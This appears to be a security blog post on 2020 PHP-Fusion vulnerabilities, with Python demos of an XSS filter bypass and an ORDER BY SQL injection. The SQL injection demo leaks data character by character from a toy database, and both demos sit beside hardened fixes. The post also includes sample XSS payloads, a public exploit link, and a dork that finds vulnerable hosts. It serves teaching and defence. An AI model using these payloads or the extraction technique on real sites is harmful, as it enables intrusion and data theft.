PHP-Fusion security vulnerabilities 2020

php-fusion on blog.firosolutions.com

In today’s exploit of the day we cover the security vulnerabilities recently published for PHP-Fusion.

PHP-Fusion is an open-source content management system, an alternative to WordPress and Joomla, with a history going back to 2003.
So far this year PHP-Fusion has collected five CVEs (CVE-2020-12438, CVE-2020-12461, CVE-2020-12706, CVE-2020-12708 and CVE-2020-12718; see the links at the end of this post).

The Q&A and shoutbox areas are both vulnerable to cross-site scripting. The two issues we look at more closely are:

  • CVE-2020-12461
    SecGus found that the search function in members.php does not properly
    validate the sort-order parameter (the value that decides in which order the
    results are displayed) before it is placed into the ORDER BY clause of the
    query sent to the MySQL backend. A third party can therefore inject their own
    SQL into the ORDER BY clause, which is a SQL injection.

  • CVE-2020-12438
    PHP-Fusion protects banner.php against cross-site scripting by removing HTML
    script tags. However, HTML lets other elements run JavaScript as well; an img tag
    with an event handler attribute such as onerror is enough, so the filter can be bypassed.
    This was quickly found and reported in issue #2307.
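The banner.php weakness above is the classic deny-list mistake: stripping one tag while the browser accepts many others. The following is an added example written for this post, not PHP-Fusion's code, with constructed sample banners. It puts a "strip script tags" filter beside the hardened alternative (encode every HTML metacharacter) and runs a rough audit over both to show which payloads still carry JavaScript.

```python
import html
import re

# Constructed sample inputs (not taken from the PHP-Fusion issue): the first is
# the only thing a "strip <script> tags" filter stops; the next two sail past it.
SAMPLE_BANNERS = {
    "script": "<script>alert(1)</script>",
    "img_onerror": '<img src=x onerror="alert(1)">',
    "svg_onload": '<svg onload="alert(1)">',
    "plain": "Welcome to our site",
}

SCRIPT_TAG_RE = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def strip_script_tags(value: str) -> str:
    """Deny-list filter in the spirit of the one described for banner.php:
    remove <script> tags and nothing else. Deliberately weak."""
    return SCRIPT_TAG_RE.sub("", value)


def escape_for_html(value: str) -> str:
    """Hardened alternative: encode every HTML metacharacter so the browser
    treats the whole value as text, whatever tags or attributes it contains."""
    return html.escape(value, quote=True)


def still_executes_js(rendered: str) -> bool:
    """Rough reviewer's check on filter output: is there still a live <script>
    tag, or an inline event handler attribute inside any remaining tag?"""
    if SCRIPT_TAG_RE.search(rendered):
        return True
    tags = re.findall(r"<[^>]+>", rendered)
    return any(EVENT_HANDLER_RE.search(tag) for tag in tags)


def audit_filter(filter_fn, samples=SAMPLE_BANNERS) -> dict:
    """Run every sample through a filter and report which ones still carry JavaScript."""
    return {name: still_executes_js(filter_fn(raw)) for name, raw in samples.items()}


if __name__ == "__main__":
    # The script sample is stopped by both filters; the img and svg payloads
    # survive the tag-stripping filter and are neutralised only by encoding.
    print("strip_script_tags:", audit_filter(strip_script_tags))
    print("escape_for_html:  ", audit_filter(escape_for_html))
```

The `still_executes_js` check is a heuristic for auditing, not a sanitizer; the point it makes is that the only robust output-side fix is contextual encoding (or a real HTML sanitizer with an allow-list of elements and attributes), never a list of forbidden tags.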

Another interesting vulnerability, which has not been assigned a CVE yet,
is a PHP object injection published on 2020-05-26.
By submitting crafted serialized data that carries SQL as a comment
through Feedback/Comments.ajax.php, a
malicious third party is allowed to execute and trigger

Link to write-up:
https://therealcoiffeur.github.io/c111

Proof of concept exploit:
https://github.com/therealcoiffeur/therealcoiffeur.github.io/blob/master/tools/PHP-Fusion/poi_to_sqli_9.03.50.py

Find hosts

We did a quick Google dork for PHP-Fusion and got about 97,000 results.

Google dork for PHP-Fusion

Find vulnerabilities in your codebase

Several of these vulnerabilities were made possible by a lack of input validation.
If you audit source code we recommend checking every input that ends up in a query
to the backend database: if raw user input is concatenated into a SQL statement,
the application is most likely vulnerable to SQL injection.

The cure is to use prepared statements with bound parameters for every value, and to write
proper input validation on top of that. MySQL’s escape function only protects quoted string
literals; it does nothing for a sort column or direction placed in an ORDER BY clause, as in
CVE-2020-12461, where the only safe approach is to compare the value against a fixed allow-list
of column names.
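To make the ORDER BY point concrete, here is an added example written for this post. It is not PHP-Fusion's code, it uses Python's built-in sqlite3 instead of MySQL so it runs offline, and the `members` and `secrets` tables are constructed stand-ins for a real schema. It shows the vulnerable pattern behind the members.php bug, why quote-escaping does not help there, how an attacker turns the sort order into a boolean oracle that leaks data one character at a time, and the allow-list plus bound-parameter fix.

```python
import sqlite3

# Constructed in-memory schema: a members table and a table with something worth
# stealing. It is not PHP-Fusion's schema; it only needs to show the pattern.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE members (user_id INTEGER PRIMARY KEY, user_name TEXT, user_joined INTEGER);
        INSERT INTO members VALUES (1, 'alice', 1000), (2, 'bob', 2000), (3, 'carol', 1500);
        CREATE TABLE secrets (flag TEXT);
        INSERT INTO secrets VALUES ('s3cr3t');
    """)
    return conn

BY_NAME = ["alice", "bob", "carol"]      # result order when sorted by user_name
BY_JOINED = ["alice", "carol", "bob"]    # result order when sorted by user_joined


def search_members_vulnerable(conn, name: str, order_by: str) -> list:
    """Vulnerable pattern: the search term and the sort column are pasted into the SQL.
    The ORDER BY part is the one that matters here; it mirrors the bug class of CVE-2020-12461."""
    sql = f"SELECT user_name FROM members WHERE user_name LIKE '%{name}%' ORDER BY {order_by}"
    return [row[0] for row in conn.execute(sql)]


def naive_escape(value: str) -> str:
    """Quote-escaping in the style of mysql_real_escape_string(): protects string literals only."""
    return value.replace("\\", "\\\\").replace("'", "''")


def build_payload(condition_sql: str) -> str:
    """Attacker's sort column: an expression that sorts by name when the condition holds and by
    join time otherwise. It contains no quote characters, so naive_escape() leaves it untouched."""
    return f"(CASE WHEN ({condition_sql}) THEN user_name ELSE user_joined END)"


def order_by_oracle(conn, condition_sql: str) -> bool:
    """Boolean oracle: the page never shows the secret, only the order of the member list."""
    return search_members_vulnerable(conn, "", build_payload(condition_sql)) == BY_NAME


def leak_flag(conn, max_len: int = 16) -> str:
    """Recover secrets.flag one character at a time through the sort-order oracle.
    unicode(substr(...)) is NULL past the end of the string, so no code matches and we stop."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            cond = f"unicode(substr((SELECT flag FROM secrets), {pos}, 1)) = {code}"
            if order_by_oracle(conn, cond):
                recovered += chr(code)
                break
        else:
            break
    return recovered


ALLOWED_SORT_COLUMNS = {"user_id", "user_name", "user_joined"}


def search_members_safe(conn, name: str, order_by: str, direction: str = "ASC") -> list:
    """Hardened pattern: the search term is bound as a parameter; the sort column and direction,
    which cannot be parameters, are checked against fixed allow-lists before use."""
    if order_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    direction = direction.upper()
    if direction not in ("ASC", "DESC"):
        raise ValueError(f"unsupported sort direction: {direction!r}")
    sql = f"SELECT user_name FROM members WHERE user_name LIKE ? ORDER BY {order_by} {direction}"
    return [row[0] for row in conn.execute(sql, (f"%{name}%",))]


if __name__ == "__main__":
    db = make_db()
    print("normal sort:      ", search_members_vulnerable(db, "", "user_name"))
    print("escaping changes: ", naive_escape(build_payload("1 = 1")) != build_payload("1 = 1"))
    print("leaked via ORDER BY:", leak_flag(db))
    print("safe search:      ", search_members_safe(db, "a", "user_name"))
```

The allow-list is the important part: column names and ASC/DESC are identifiers and keywords, so a driver cannot bind them as parameters and an escape function has nothing to quote. Everything that is a value (the search term) goes through a placeholder.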

https://en.wikipedia.org/wiki/PHP-Fusion
https://vulns.firosolutions.com/cve/CVE-2020-12718/
https://vulns.firosolutions.com/cve/CVE-2020-12708/
https://vulns.firosolutions.com/cve/CVE-2020-12706/
https://vulns.firosolutions.com/cve/CVE-2020-12461/
https://vulns.firosolutions.com/cve/CVE-2020-12438/
https://packetstormsecurity.com/files/158077/PHP-Fusion-9.03.60-PHP-Object-Injection-SQL-Injection.html
https://www.php-fusion.co.uk/home.php